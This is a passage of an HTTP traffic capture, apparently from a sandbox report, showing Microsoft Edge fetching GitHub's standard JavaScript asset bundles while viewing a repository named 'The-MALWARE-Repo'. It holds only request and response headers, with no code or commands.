date: Sat, 05 Oct 2024 16:06:04 GMT
age: 3389753
x-served-by: cache-iad-kiad7000133-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 17262, 30057
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 151251de3cb78d0fe8bf7e2cb01b8f0c2cdfdb63
content-length: 4125
GET

https://github.githubassets.com/assets/notifications-global-54f34167118d.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/notifications-global-54f34167118d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 03 Oct 2024 20:54:48 GMT
etag: "0x8DCE3ED9E5FB54D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 70452
x-served-by: cache-iad-kjyo7100142-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 5, 2871
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e8d034379eaad493c2dea15346d2fe32f6669d49
content-length: 101727
GET

https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A0C1B6EE"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 1491810
x-served-by: cache-iad-kiad7000080-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 3484, 19809
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7c9bfa8abe2a4ed844fc1d02dbf349fdbfa88c3c
content-length: 2607
GET

https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-e53a3f-96e856171702.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-e53a3f-96e856171702.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:06 GMT
etag: "0x8DCB7D59CFCE0CF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 2565849
x-served-by: cache-iad-kjyo7100029-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 997, 33786
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a423e0f9e20d10f0cd8a7ba86a44bb1c57ae2311
content-length: 54857
GET

https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-00df584d9e79.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_ref-selector_ts-00df584d9e79.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 12:45:23 GMT
etag: "0x8DCE4726A126E60"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 85394
x-served-by: cache-iad-kiad7000069-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 33, 3738
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5af41082c60285a8be01d4d443f019418b09d4fe
content-length: 38897
GET

https://github.githubassets.com/assets/codespaces-3bf9ff7d0f93.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/codespaces-3bf9ff7d0f93.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 07:22:37 GMT
etag: "0x8DCDD32D5113C85"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 894121
x-served-by: cache-iad-kcgs7200116-IAD, cache-ams2100121-AMS
x-cache: MISS, HIT
x-cache-hits: 0, 21170
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3ec29b6e8aa42948ca2c9db142000e3e8f5cff45
content-length: 7021
GET

https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-cdab1b-03eba6ef6933.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-cdab1b-03eba6ef6933.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 27 Sep 2024 21:50:25 GMT
etag: "0x8DCDF3E65190438"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 662930
x-served-by: cache-iad-kjyo7100067-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 54, 16817
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 475fe71525d4ea8ce1836cbcbbc5eb5dfed7bbb6
content-length: 17869
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-a6774a3bb897.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-a6774a3bb897.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 23 Jul 2024 20:26:54 GMT
etag: 0x8DCAB55CAE8ABD4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 3994058
x-served-by: cache-iad-kiad7000040-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 16669, 22828
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 56015623bf29934b73c26baf27694b4b23d5f192
content-length: 3888
GET

https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--b0e14d-a57a4c842e6f.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--b0e14d-a57a4c842e6f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 20 Aug 2024 15:46:26 GMT
etag: "0x8DCC12F400738CD"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 3220163
x-served-by: cache-iad-kjyo7100129-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 12328, 30040
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0ed933d137ccdae6011fb0fae0afabed1ae754bd
content-length: 3038
GET

https://github.githubassets.com/assets/repositories-d27a99fb2b65.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/repositories-d27a99fb2b65.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:06 GMT
etag: "0x8DCE312793AC747"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181494
x-served-by: cache-iad-kjyo7100154-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 1, 5310
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: cd29fff9bc4073974d7c62ea2e986cbf8cfc8651
content-length: 8264
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-e73b311a14f1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-e73b311a14f1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
content-md5: HrZPbOsAqjEuZap5MzU5RQ==
last-modified: Wed, 14 Aug 2024 19:47:52 GMT
etag: "0x8DCBC99FC1EE62A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 1566254
x-served-by: cache-iad-kjyo7100032-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 445, 22763
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 41f274feeae3086470e8645cc40b42903f435713
content-length: 3258
GET

https://github.githubassets.com/assets/code-menu-ab2b8d126a2a.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/code-menu-ab2b8d126a2a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:06 GMT
etag: "0x8DCE31279913895"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181508
x-served-by: cache-iad-kcgs7200146-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 2, 5053
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 51508ea2e3f181ba0ee456cc8be2d851fb2fdcbd
content-length: 8095
GET

https://github.githubassets.com/assets/primer-react-c2abd9301d38.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/primer-react-c2abd9301d38.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 19 Sep 2024 22:11:30 GMT
etag: "0x8DCD8F803DB004C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 1027331
x-served-by: cache-iad-kiad7000101-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 31, 22290
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 377a9430d406ad8f418cd494586ba3238eb8816d
content-length: 4342
GET

https://github.githubassets.com/assets/react-core-38a70e7c3127.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/react-core-38a70e7c3127.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 07:22:44 GMT
etag: "0x8DCDD32D933354D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 894121
x-served-by: cache-iad-kiad7000165-IAD, cache-ams2100121-AMS
x-cache: MISS, HIT
x-cache-hits: 0, 23751
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 67903e714835540e89f15a4d280ab3c1f86f1a2d
content-length: 4537
GET

https://github.githubassets.com/assets/react-lib-7b7b5264f6c1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/react-lib-7b7b5264f6c1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 07:22:37 GMT
etag: "0x8DCDD32D4FD2ECC"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 894121
x-served-by: cache-iad-kcgs7200082-IAD, cache-ams2100121-AMS
x-cache: MISS, HIT
x-cache-hits: 0, 23310
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 54758facc525300c2df8e91b0a12d9d2f9580762
content-length: 3378
GET

https://github.githubassets.com/assets/octicons-react-45c3a19dd792.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/octicons-react-45c3a19dd792.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 15:02:45 GMT
etag: "0x8DCE4859A5BF186"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 85394
x-served-by: cache-iad-kjyo7100164-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 33, 3363
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f9785131f68f10e9947e10d1f895fa0b16418700
content-length: 3353
GET

https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-41da55-1851acd376ff.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-41da55-1851acd376ff.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:05 GMT
etag: "0x8DCE31278FD8DF2"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181517
x-served-by: cache-iad-kcgs7200069-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 9, 8744
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ed65e432c24f29164ff830fdc47494dc6239ca99
content-length: 12363
GET

https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-46e1f260cd63.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-46e1f260cd63.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:02 GMT
etag: "0x8DCE3127730EEAF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181517
x-served-by: cache-iad-kiad7000161-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 9, 8911
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d54d88e42e0d73e236af5e0ee79af3afd8c112cc
content-length: 90797
GET

https://github.githubassets.com/assets/notifications-subscriptions-menu-74dc9402b497.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/notifications-subscriptions-menu-74dc9402b497.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:06 GMT
etag: "0x8DCE31279A766BF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181517
x-served-by: cache-iad-kcgs7200169-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 9, 8705
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 2a8f086241db63e19ec4266b7b8e2f7493ad45cc
content-length: 3066
GET

https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hotkey_dist_index_js-no-d67c7f-bd7d077cdcb1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hotkey_dist_index_js-no-d67c7f-bd7d077cdcb1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:05 GMT
etag: "0x8DCE312790353D7"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181517
